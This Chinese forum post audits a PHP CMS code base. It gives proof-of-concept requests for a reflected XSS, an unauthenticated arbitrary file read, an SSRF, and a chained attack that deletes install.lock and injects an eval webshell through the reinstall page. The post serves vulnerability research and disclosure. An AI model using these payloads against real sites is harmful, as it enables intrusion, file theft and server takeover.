问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
某CMS代码审计
渗透测试
第一次尝试CMS的代码审计
0x00 审计前的准备 =========== php7.4 vscode + phpdebug 从index.php页面看起 一些渲染页面 包含了一些配置文件 先看懂代码具体实现的功能 go~~~ 0x01 前端xss ========== /apiRun.php 漏洞关键位置代码 ```php function AutoRun(){ $mode = trim(@$_GET['mode']); $sec = trim(@$_GET['sec']); if (is_numeric($sec) == false){ $sec = 300; } if ($sec < 60){ $sec = 300; } ?> ...... ...... ...... var mode = "<?php echo($mode); ?>"; ``` 没有做任何处理 构造poc `/apiRun.php?mudi=autoRun&mode=";alert(/xss/);//&sec=300` 漏洞证明 data:image/s3,"s3://crabby-images/f9245/f9245ea07ce2db78b728f34878cd849515e09368" alt="OTCMS-01.png" 0x02 未授权任意文件读取 ============== 虽然位于admin目录下但并未没这行代码 `$MB->Open('','login');` 故造成了未授权 admin/readDeal.php 漏洞关键位置代码 ```php function ReadQrCode(){ $dir = OT::GetStr('dir'); $img = OT::GetStr('img'); if (strlen($img) == 0){ die('二维码图片路径为空'); } if (! Is::HttpUrl($img)){ $img = StrInfo::FilePath($dir, $img); if (! file_exists($img)){ die('二维码图片不存在('. $img .')'); } } include_once(OT_ROOT .'inc/QrReader/QrReader.php'); $qrcode = new QrReader($img); // 图片路径 $text = $qrcode->text(); //返回识别后的文本 if (strlen($text) == 0){ die('二维码图片识别不了'); } die($text); } ``` 判断了img是否为http/https协议,如果不是则判断本地文件是否存在 进入`new QrReader($img);`查看 data:image/s3,"s3://crabby-images/75795/7579506d1ce9d83a11368781a1b0c881a606b245" alt="OTCMS-03 1.png" 给了$sourcetype默认值 进入`QrReader::SOURCE_TYPE_FILE` 调用了`file_get_contents`函数 造成了任意文件读取(因为穷,装不起那个插件,所以只能本地echo出来)如果有那个插件图片内容应该是可以生成出来的。(我的猜想因为只是第一次审计) 漏洞证明 data:image/s3,"s3://crabby-images/c38a6/c38a643c0f7d9bf5b79d3cbec0795d8c6eda6494" alt="OTCMS-02.png" `` 组合拳getshell =========== 0x01 任意文件删除 ----------- userCenter\_deal.php处 data:image/s3,"s3://crabby-images/ebaa3/ebaa3b8faab8e7a89def71cf2f24def6de5c7fd2" alt="OTCMS-04.png" 获取了几个变量值 进入正则匹配 并且其中有的不为空 跟进正则匹配 data:image/s3,"s3://crabby-images/67a7c/67a7c444f20a2d283fada3aff2c8517c04b712ed" alt="OTCMS-05.png" data:image/s3,"s3://crabby-images/10c4a/10c4aab69cfcda63e9914711005e82f40c73b505" alt="OTCMS-06.png" 只需要为其中的字符即可 继续往下 data:image/s3,"s3://crabby-images/fed2c/fed2cd68de8e9dd31dc1c54f0aefd0cd5ef68fe7" alt="OTCMS-07.png" 这里获取了个人信息 只需要注册即可 继续往下 进入了File::Del函数 data:image/s3,"s3://crabby-images/96771/967718da7277c6773bba146ff2f0f81160a547ac" alt="OTCMS-08.png" 跟进 data:image/s3,"s3://crabby-images/ab5bf/ab5bf337113a91444d42e65f3acbf835a0f7d81d" alt="OTCMS-09.png" 无任何过滤 直接删除了文件 看一下`userCenter_deal.php`文件的开头 data:image/s3,"s3://crabby-images/736cd/736cd8632c8705fcb61788075ccff790d81d588c" alt="OTCMS-10.png" data:image/s3,"s3://crabby-images/14f65/14f6514c1dc3f7157a9fd65bd8e9bcd375866c29" alt="OTCMS-11.png" 检查了Referer是否和HOST相等(用来防御csrf) 构造payload把install.lock删除 ```http http://127.0.0.1/usersCenter_deal.php?mudi=rev revType=app&dashangImg1=huahua&dashangImg2=huahua&dashangImg3=huahua&dashangImg1Old=../../cache/web/install.lock Referer:http://127.0.0.1 ``` 成功访问到重装页面 利用重装写shell 这里没有任何过滤 data:image/s3,"s3://crabby-images/fdfe0/fdfe07e294bbda1345b52a2b64a06da7e56719af" alt="OTCMS-13.png" 利用accBackupDir写shell 构造poc ```http http://127.0.0.1/install/index.php?mudi=run accBackupDir=1');eval($_POST[1]);#&accDir=&accName=&adminDir=admin&adminName=admin&adminPwd=admin&dbType=mysql&isImport=2&mysqlState=1&sqlDbName=OTCMS&sqlIp=localhost&sqlPo=3306&sqlPref=OT_&sqlUserPwd=root&sqlUsername=root ``` data:image/s3,"s3://crabby-images/b0b85/b0b859ff42b5bd0b7cef6220c05e11f994908c3b" alt="OTCMS-14.png" 成功getshell 0x03 后台ssrf =========== inc/classReqUrl.php 漏洞关键位置代码 ```php public static function UseCurl($method, $url, $charset='UTF-8', $dataArr=array()){ if (empty($url)){ return array('res'=>false, 'note'=>'UseCurl:网址为空'); } $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)'); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 80); // 响应时间 curl_setopt($ch ,CURLOPT_TIMEOUT, 150); // 设置超时 // 使用的HTTP协议,CURL_HTTP_VERSION_NONE(让curl自己判断),CURL_HTTP_VERSION_1_0(HTTP/1.0),CURL_HTTP_VERSION_1_1(HTTP/1.1) curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0); if (substr(strtolower($url),0,8) == 'https://'){ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // 跳过证书检查 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); // 从证书中检查SSL加密算法是否存在 } if (strtoupper($method) == 'POST'){ if (is_array($dataArr)){ $newData = http_build_query($dataArr); // 相反函数 parse_str() }else{ $newData = $dataArr; } curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $newData); } $data = curl_exec($ch); ``` info\_deal.php中 data:image/s3,"s3://crabby-images/e010c/e010c57b10b08aa3adafb302a682828b31c23485" alt="OTCMS-15.png" 跟进这行代码 其中img参数可控 data:image/s3,"s3://crabby-images/84eb5/84eb517ddc95982312c0d94a5f22edbc5324640a" alt="OTCMS-16.png" 跟进`GetUrlContent`函数 data:image/s3,"s3://crabby-images/c4557/c4557cc46f87a7fed894713d2f36a62147f7db4a" alt="OTCMS-17 1.png" 跟进`ReqUrl::UseAuto`函数 发现了三个传参 0 GET $url data:image/s3,"s3://crabby-images/86400/86400349ee1796c48093fea752307a33d976d3f8" alt="OTCMS-18.png" 在`inc/classReqUrl.php`中`UseAuto`函数由于mode传参为0 且安装了curl插件 进入了`self::UseCurl`函数 data:image/s3,"s3://crabby-images/7fc10/7fc102b14c2ce20379b120ecd0e2686334f760e4" alt="OTCMS-19.png" 有回显的ssrf 从头开始看如何进入`self::RemoteFile`函数呢? 我们只需要满足 这里 data:image/s3,"s3://crabby-images/9bef9/9bef97245815cca11a9f6ed97838cbc25bc0226f" alt="OTCMS-20.png" 这里 data:image/s3,"s3://crabby-images/1744b/1744b3f5f4439c15afa741b57b8e32a59c7e6c19" alt="OTCMS-21.png" 即可 data:image/s3,"s3://crabby-images/be23b/be23b74c35d950de9045f46ddfa83d1b502da890" alt="OTCMS-22.png" 并且都为post传参很好满足 构造poc data:image/s3,"s3://crabby-images/818c1/818c11a414f6407edbfe64b0a791c165890f52ea" alt="OTCMS-23.png" 成功收到请求 data:image/s3,"s3://crabby-images/5ed96/5ed960072c5e96d04efa3f7f74bfbc672c82649c" alt="OTCMS-24.png" 总结 -- 这套源码整体来说,不是很难,后台洞还是很多的。
发表于 2022-05-11 09:40:12
阅读 ( 5696 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
花北城
4 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!